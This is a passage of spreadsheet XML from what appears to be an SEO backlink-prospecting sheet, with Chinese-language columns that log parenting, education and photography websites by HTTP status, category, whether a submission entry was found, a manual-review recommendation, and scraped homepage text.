      <x:c r="T544" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://huihangda.com
http://huihangda.com</x:v>
      </x:c>
    </x:row>
    <x:row r="545">
      <x:c r="A545" s="18" t="str">
        <x:v>544</x:v>
      </x:c>
      <x:c r="B545" s="19" t="str">
        <x:v>amyboyington.com</x:v>
      </x:c>
      <x:c r="C545" s="19" t="str">
        <x:v>https://amyboyington.com</x:v>
      </x:c>
      <x:c r="D545" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E545" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F545" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G545" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H545" s="19" t="str">
        <x:v>https://amyboyington.com/</x:v>
      </x:c>
      <x:c r="I545" s="19" t="str">
        <x:v>→ Parenting and Family Content Writer</x:v>
      </x:c>
      <x:c r="J545" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K545" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L545" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M545" s="19" t="str">
        <x:v>https://amyboyington.com/</x:v>
      </x:c>
      <x:c r="N545" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O545" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P545" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q545" s="21" t="str">
        <x:v>Blog management and content creation services, plus parenting and career resources, tips, and support to manage your family and business as a busy parent. → Parenting and Family Content Writer Skip to content Home About Services Portfolio Blogging for Business Blog+Career Amy Boyington Freelance writer for parenting, education, and family-focused businesses. Learn more Leave your content in my hands When you work with me, you get over 20 years of blogging and digital content writing experience. Monthly Blogging Packages I create custom blogging and content packages based on your business’s unique needs. Need one blog post per month? Great. Need two per week? Cool. My pricing reflects what you need and remains consistent each month, so there are no surprises. Audience-Focused Content SEO isn’t what it used to be. If you haven’t heard the news, </x:v>
      </x:c>
      <x:c r="R545" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S545" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T545" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://amyboyington.com</x:v>
      </x:c>
    </x:row>
    <x:row r="546">
      <x:c r="A546" s="18" t="str">
        <x:v>545</x:v>
      </x:c>
      <x:c r="B546" s="19" t="str">
        <x:v>empoweredmontessorimama.com</x:v>
      </x:c>
      <x:c r="C546" s="19" t="str">
        <x:v>https://empoweredmontessorimama.com</x:v>
      </x:c>
      <x:c r="D546" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E546" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F546" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G546" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H546" s="19" t="str">
        <x:v>https://empoweredmontessorimama.com/</x:v>
      </x:c>
      <x:c r="I546" s="19" t="str">
        <x:v>Empowered Montessori Mama – Nurturing independence, Redefining possibilities</x:v>
      </x:c>
      <x:c r="J546" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K546" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L546" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M546" s="19" t="str">
        <x:v>https://empoweredmontessorimama.com/</x:v>
      </x:c>
      <x:c r="N546" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O546" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P546" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q546" s="21" t="str">
        <x:v>Montessori-inspired ideas, thoughtful family routines and honest reflections on parenting while living with chronic illness and fluctuating energy. . Welcome to Empowered Montessori Mama! I'm a mum of two who has always been fascinated by how children learn, explore and grow into confident, capable individuals. Alongside raising my family, I've spent much of my life&amp;hellip; Empowered Montessori Mama – Nurturing independence, Redefining possibilities Skip to content Empowered Montessori Mama Health Helping families build joyful, independent childhoods—one realistic step at a time. Parenting About me Contact Me Helping families build joyful, independent childhoods—one realistic step at a time. Montessori-inspired ideas, thoughtful family routines and honest reflections on parenting while living with chronic illness and fluctuating energy. . Welcome to Empowered Montessori Mama! I’m a mum of two who has always been fascinated by how children learn, explore and grow into confident, capable individuals. Alongside raising my family, I’ve spent much of my life navigat</x:v>
      </x:c>
      <x:c r="R546" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S546" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T546" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://empoweredmontessorimama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="547">
      <x:c r="A547" s="18" t="str">
        <x:v>546</x:v>
      </x:c>
      <x:c r="B547" s="19" t="str">
        <x:v>freebiebag.co.uk</x:v>
      </x:c>
      <x:c r="C547" s="19" t="str">
        <x:v>https://freebiebag.co.uk</x:v>
      </x:c>
      <x:c r="D547" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E547" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F547" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G547" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H547" s="19" t="str">
        <x:v>https://freebiebag.co.uk/</x:v>
      </x:c>
      <x:c r="I547" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J547" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K547" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L547" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M547" s="19" t="str">
        <x:v>https://freebiebag.co.uk/</x:v>
      </x:c>
      <x:c r="N547" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O547" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P547" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q547" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R547" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S547" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T547" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://freebiebag.co.uk</x:v>
      </x:c>
    </x:row>
    <x:row r="548">
      <x:c r="A548" s="18" t="str">
        <x:v>547</x:v>
      </x:c>
      <x:c r="B548" s="19" t="str">
        <x:v>remedies-and-recipes.com</x:v>
      </x:c>
      <x:c r="C548" s="19" t="str">
        <x:v>https://remedies-and-recipes.com</x:v>
      </x:c>
      <x:c r="D548" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E548" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F548" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G548" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H548" s="19" t="str">
        <x:v>https://remedies-and-recipes.com/</x:v>
      </x:c>
      <x:c r="I548" s="19" t="str">
        <x:v>Remedies and Recipes | Natural remedies and tasty recipes to support a healthy way of life.</x:v>
      </x:c>
      <x:c r="J548" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K548" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L548" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M548" s="19" t="str">
        <x:v>https://remedies-and-recipes.com/</x:v>
      </x:c>
      <x:c r="N548" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O548" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P548" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q548" s="21" t="str">
        <x:v>Remedies and Recipes | Natural remedies and tasty recipes to support a healthy way of life. Skip to main content Natural remedies and tasty recipes to support a healthy way of life. Brain Remedies Recipes Heart Remedies Recipes Joint Remedies Recipes Digestion Remedies Recipes Cancer Fighting Remedies Recipes Immunity Remedies Recipes Weight Management Remedies Recipes Kitchen Hacks ▸ © 2015-2026 Remedies &amp; Recipes</x:v>
      </x:c>
      <x:c r="R548" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S548" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T548" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://remedies-and-recipes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="549">
      <x:c r="A549" s="18" t="str">
        <x:v>548</x:v>
      </x:c>
      <x:c r="B549" s="19" t="str">
        <x:v>aliwinstonphotography.com</x:v>
      </x:c>
      <x:c r="C549" s="19" t="str">
        <x:v>https://aliwinstonphotography.com</x:v>
      </x:c>
      <x:c r="D549" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E549" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F549" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G549" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H549" s="19" t="str">
        <x:v>https://aliwinstonphotography.com/</x:v>
      </x:c>
      <x:c r="I549" s="19" t="str">
        <x:v>Atlanta Maternity, Newborn and Family Photographer, GA</x:v>
      </x:c>
      <x:c r="J549" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K549" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L549" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M549" s="19" t="str">
        <x:v>https://aliwinstonphotography.com/</x:v>
      </x:c>
      <x:c r="N549" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O549" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P549" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q549" s="21" t="str">
        <x:v>Ali Winston Photography offers professional maternity, newborn and family photography services in Atlanta, GA. Capture precious moments with stunning, personalized portraits that celebrate your unique story. Atlanta Maternity, Newborn and Family Photographer, GA Blog Contact Sessions About Home investment Blog Contact Sessions About Home investment Maternity Baby Family Heirloom Home About SESSIONS Contact blog Investment Heirloom Ali winston photography Atlanta Maternity, Newborn, &amp; Family Photography, Georgia The best part about being a newborn photographer in Atlanta is watching your family grow (and holding babies). I have the pleasure of providing families with classic sessions with a bright modern twist. I pride myself on providing a high end experience to my clients, and I’d love to photograph yours next! Clean &amp; Classic Photography for Modern Families hey! I'M ALI You’re not a regular mo</x:v>
      </x:c>
      <x:c r="R549" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S549" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T549" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://aliwinstonphotography.com</x:v>
      </x:c>
    </x:row>
    <x:row r="550">
      <x:c r="A550" s="18" t="str">
        <x:v>549</x:v>
      </x:c>
      <x:c r="B550" s="19" t="str">
        <x:v>homeschoolandhappiness.com</x:v>
      </x:c>
      <x:c r="C550" s="19" t="str">
        <x:v>https://homeschoolandhappiness.com</x:v>
      </x:c>
      <x:c r="D550" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E550" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F550" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G550" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H550" s="19" t="str">
        <x:v>https://homeschoolandhappiness.com/</x:v>
      </x:c>
      <x:c r="I550" s="19" t="str">
        <x:v>Homeschool and Happiness</x:v>
      </x:c>
      <x:c r="J550" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K550" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L550" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M550" s="19" t="str">
        <x:v>https://homeschoolandhappiness.com/</x:v>
      </x:c>
      <x:c r="N550" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O550" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P550" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q550" s="21" t="str">
        <x:v>Weekly Homeschool and Happiness Skip to content About Substack Printable Library Signup Free Seasonal Writing Prompts Crafts Holidays Homeschooling Printables Recipes Crafts Printables Recipes Homeschool and Happiness What Is Gameschooling? If you've spent any time looking for homeschool ideas, you may have heard the word... Read More What Is Gameschooling? Superhero Finger Puppets With just a few crafting supplies and some imagination, you can put together these easy... Read More Superhero Finger Puppets Weekly Writing Prompts Get fun seasonal writing prompts every week to help promote creativity, writing, and more. See the Latest Crafts &amp; Activities See More Superhero Finger Puppets 10 Paper Flow</x:v>
      </x:c>
      <x:c r="R550" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S550" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T550" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://homeschoolandhappiness.com</x:v>
      </x:c>
    </x:row>
    <x:row r="551">
      <x:c r="A551" s="18" t="str">
        <x:v>550</x:v>
      </x:c>
      <x:c r="B551" s="19" t="str">
        <x:v>theodysseyonline.com</x:v>
      </x:c>
      <x:c r="C551" s="19" t="str">
        <x:v>https://theodysseyonline.com</x:v>
      </x:c>
      <x:c r="D551" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E551" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F551" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G551" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H551" s="19" t="str">
        <x:v>https://www.theodysseyonline.com/</x:v>
      </x:c>
      <x:c r="I551" s="19" t="str">
        <x:v>The Odyssey Online</x:v>
      </x:c>
      <x:c r="J551" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K551" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L551" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M551" s="19" t="str">
        <x:v>https://www.theodysseyonline.com/</x:v>
      </x:c>
      <x:c r="N551" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O551" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P551" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q551" s="21" t="str">
        <x:v>The Odyssey Online Odyssey Powered by RebelMouse Currently Swoon Lifestyle Health &amp; Wellness Student Life Content Inspiration Entertainment Politics and Activism Sports Adulting About us Terms Privacy DMCA Contact us ® 2026 ODYSSEY Welcome back Sign in to comment to your favorite stories, participate in your community and interact with your friends Forgot your password? Log in or LOG IN WITH FACEBOOK No account? Create one Start writing a post Sports Dancers: Athletes Too! Dancers should be given the recognition they deserve Krista Topp 22 April RebelMouse Tech Team Carroll University 86811 StableDiffusion Key Takeaways Dancers meet the Merriam-Webster definition of "athlete," which requires</x:v>
      </x:c>
      <x:c r="R551" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S551" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T551" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://theodysseyonline.com</x:v>
      </x:c>
    </x:row>
    <x:row r="552">
      <x:c r="A552" s="18" t="str">
        <x:v>551</x:v>
      </x:c>
      <x:c r="B552" s="19" t="str">
        <x:v>listennotes.com</x:v>
      </x:c>
      <x:c r="C552" s="19" t="str">
        <x:v>https://listennotes.com</x:v>
      </x:c>
      <x:c r="D552" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E552" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F552" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G552" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H552" s="19" t="str">
        <x:v>https://www.listennotes.com/</x:v>
      </x:c>
      <x:c r="I552" s="19" t="str">
        <x:v>Listen Notes: The best podcast search engine</x:v>
      </x:c>
      <x:c r="J552" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K552" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L552" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M552" s="19" t="str">
        <x:v>https://www.listennotes.com/</x:v>
      </x:c>
      <x:c r="N552" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O552" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P552" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q552" s="21" t="str">
        <x:v>The most comprehensive podcast database online. Discover best podcasts. Search podcast show notes and audio transcripts by people, places, or topics. Listen Notes: The best podcast search engine Listen Later API Data Discover Real-Time Episodes being played now Explorer Find similar podcasts Best Podcasts Recommended by us Hot Podcasts Popular shows today Curated Podcasts Recommended by media Playlists Playlists from our community Classified Ads Help needed for podcasts Podcast Academy Learn podcasting Podcast Discovery MORE &amp;vert; Login The Best Podcast Search Engine TM FOR LISTENERS Listen Later Curate podcast playlists Listen Clips Create podcast clips Listen Alerts Monitor podcast mentions Info for Listeners FOR BUSINESSES Podcast API Build podcast apps Podcast Datasets Batch export podcasts Premium Membership Advanced search features</x:v>
      </x:c>
      <x:c r="R552" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S552" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T552" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://listennotes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="553">
      <x:c r="A553" s="18" t="str">
        <x:v>552</x:v>
      </x:c>
      <x:c r="B553" s="19" t="str">
        <x:v>littlesproutslearning.co</x:v>
      </x:c>
      <x:c r="C553" s="19" t="str">
        <x:v>https://littlesproutslearning.co</x:v>
      </x:c>
      <x:c r="D553" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E553" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F553" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G553" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H553" s="19" t="str">
        <x:v>https://littlesproutslearning.co/</x:v>
      </x:c>
      <x:c r="I553" s="19" t="str">
        <x:v>Little Sprouts Learning, Raising Happy, Healthy Kids!</x:v>
      </x:c>
      <x:c r="J553" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K553" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L553" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M553" s="19" t="str">
        <x:v>https://littlesproutslearning.co/</x:v>
      </x:c>
      <x:c r="N553" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O553" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P553" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q553" s="21" t="str">
        <x:v>Ideas to help home daycare providers and families raise happy healthy kids. Gardening, activities, easy meals, and more for kids and caretakers. Little Sprouts Learning, Raising Happy, Healthy Kids! Skip to content Little Sprouts Learning Daycare Business Hacks Kids Activities Gardening Ideas Recipes Tips for Families Shop Little Sprouts Learning Ideas for Raising Happy Healthy Kids — DAYCARE BUSINESS HACKS — Home Daycare Setup Checklist (Free Printable) How to Write a Daycare Handbook: Everything You Need to Include How to Prepare for a Daycare Licensing Visit Without Stress — RECIPES — Easy Leftover Turkey Fried Rice Recipe 7 Ways to Preserve Green Beans Without Canning Old-Fashioned Dill Pickled Eggs (No Canning Required) — GARDENING — Vegetables to Plant in August for a Fall Harvest 25 Garden Fundraiser Ideas for Daycare and Pres</x:v>
      </x:c>
      <x:c r="R553" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S553" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T553" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://littlesproutslearning.co</x:v>
      </x:c>
    </x:row>
    <x:row r="554">
      <x:c r="A554" s="18" t="str">
        <x:v>553</x:v>
      </x:c>
      <x:c r="B554" s="19" t="str">
        <x:v>redrosespeechies.com</x:v>
      </x:c>
      <x:c r="C554" s="19" t="str">
        <x:v>https://redrosespeechies.com</x:v>
      </x:c>
      <x:c r="D554" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E554" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F554" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G554" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H554" s="19" t="str">
        <x:v>https://www.redrosespeechies.com/</x:v>
      </x:c>
      <x:c r="I554" s="19" t="str">
        <x:v>Red Rose Speechies | Enhance Speech Therapy - Subscribe Now</x:v>
      </x:c>
      <x:c r="J554" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K554" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L554" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M554" s="19" t="str">
        <x:v>https://www.redrosespeechies.com/</x:v>
      </x:c>
      <x:c r="N554" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O554" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P554" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q554" s="21" t="str">
        <x:v>Explore themed speech therapy materials and monthly subscriptions designed for speech-language pathologists. Access engaging resources for diverse therapy goals. Red Rose Speechies | Enhance Speech Therapy - Subscribe Now Skip to Content Open Menu Close Menu Shop Our Stuff TPT Store Blog Login Account 0 0 Shop Our Stuff TPT Store Blog Login Account 0 0 Open Menu Close Menu Shop Our Stuff TPT Store Blog Login Account Hi! I’m Janae and I’m Allyssa! Red Rose Speechies is built from a shared love for themed therapy materials. Back when we worked together, we were always sharing monthly books, seasonal dollar store finds, and fun motivating holiday activities. The idea sparked to share this love with all of you. I’m Janae (left)! I am a speech language pathologist that lives in the Nashville, Tennessee area. I graduated from Tennessee State University. I </x:v>
      </x:c>
      <x:c r="R554" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S554" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T554" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://redrosespeechies.com</x:v>
      </x:c>
    </x:row>
  </x:sheetData>
  <x:conditionalFormatting sqref="N2:N554">
    <x:cfRule type="containsText" dxfId="0" priority="1" operator="containsText" text="可做"/>
    <x:cfRule type="containsText" dxfId="1" priority="2" operator="containsText" text="需人工核验"/>
    <x:cfRule type="containsText" dxfId="2" priority="3" operator="containsText" text="付费/不优先"/>
    <x:cfRule type="containsText" dxfId="3" priority="4" operator="containsText" text="不建议"/>
    <x:cfRule type="containsText" dxfId="4" priority="5" operator="containsText" text="无法核验"/>
  </x:conditionalFormatting>
  <x:dataValidations count="2">
    <x:dataValidation type="list" sqref="N2:N554">
      <x:formula1>"可做,需人工核验,付费/不优先,不建议,无法核验"</x:formula1>
    </x:dataValidation>
    <x:dataValidation type="list" sqref="O2:O554">
      <x:formula1>"高,中,低"</x:formula1>
    </x:dataValidation>
  </x:dataValidations>
  <x:pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <x:tableParts count="1">
    <x:tablePart xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="Rc61f62361d9740a9"/>
  </x:tableParts>
</x:worksheet>
</file>